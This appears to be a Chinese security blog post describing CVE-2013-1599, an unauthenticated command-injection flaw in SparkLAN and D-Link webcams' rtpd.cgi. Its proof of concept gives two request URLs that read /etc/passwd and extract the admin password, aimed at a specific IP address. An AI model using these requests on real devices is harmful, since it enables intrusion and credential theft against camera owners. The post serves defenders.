网络摄像头安全一览表 2019-03-17 硬件设备缺陷 | 注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。 [TOC] SparkLAN网络摄像头CVE-2013-1599描述:该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。 多个D-Link网络摄像头产品’/var/www/cgi-bin/rtpd.cgi’存在输入验证漏洞,允许远程攻击者利用漏洞提交类似如下的请求以应用程序上下文执行任意命令: 漏洞证明: 点击阅读完整原文 注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。 [TOC] SparkLAN网络摄像头CVE-2013-1599描述:该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。 多个D-Link网络摄像头产品’/var/www/cgi-bin/rtpd.cgi’存在输入验证漏洞,允许远程攻击者利用漏洞提交类似如下的请求以应用程序上下文执行任意命令: 漏洞证明:12345#1.查看/etc/passwdhttp://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd#2.获取摄像头密码http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount 参考:https://www.cnvd.org.cn/flaw/show/CNVD-2013-04632 X 你好看友,欢迎关注博主微信公众号哟! ❤ 这将是我持续更新文章的动力源泉,谢谢支持!(๑′ᴗ‵๑) 温馨提示: 未解锁的用户不能粘贴复制文章内容哟! 方式1.请访问本博主的B站【WeiyiGeek】首页关注UP主,将自动随机获取解锁验证码。 Method 2.Please visit 【My Twitter】. There is an article verification code in the homepage. 方式3.扫一扫下方二维码,关注本站官方公众号 回复:验证码 将获取解锁(有效期7天)本站所有技术文章哟! 提 交 @WeiyiGeek - 为了能到远方,脚下的每一步都不能少 欢迎各位志同道合的朋友一起学习交流,如文章有误请在下方留下您宝贵的经验知识,个人邮箱地址【master#weiyigeek.top】或者个人公众号【WeiyiGeek】联系我。 更多文章来源于【WeiyiGeek Blog - 为了能到远方,脚下的每一步都不能少】, 个人首页地址( https://weiyigeek.top ) 专栏书写不易,如果您觉得这个专栏还不错的,请给这篇专栏 【点个赞、投个币、收个藏、关个注、转个发、赞个助】,这将对我的肯定,我将持续整理发布更多优质原创文章!。 最后更新时间:2023-06-06 17:20:22 文章原始路径:_posts/硬件物联/物联安全/Camera/网络摄像头安全一览表.md 转载注明出处,原文地址:https://blog.weiyigeek.top/2019/3-17-66.html本站文章内容遵循 知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议 ☕️ 请作者喝杯咖啡! Prev Hexo博客框架初识入门到进阶 Next 网页编码显示与CSS加载
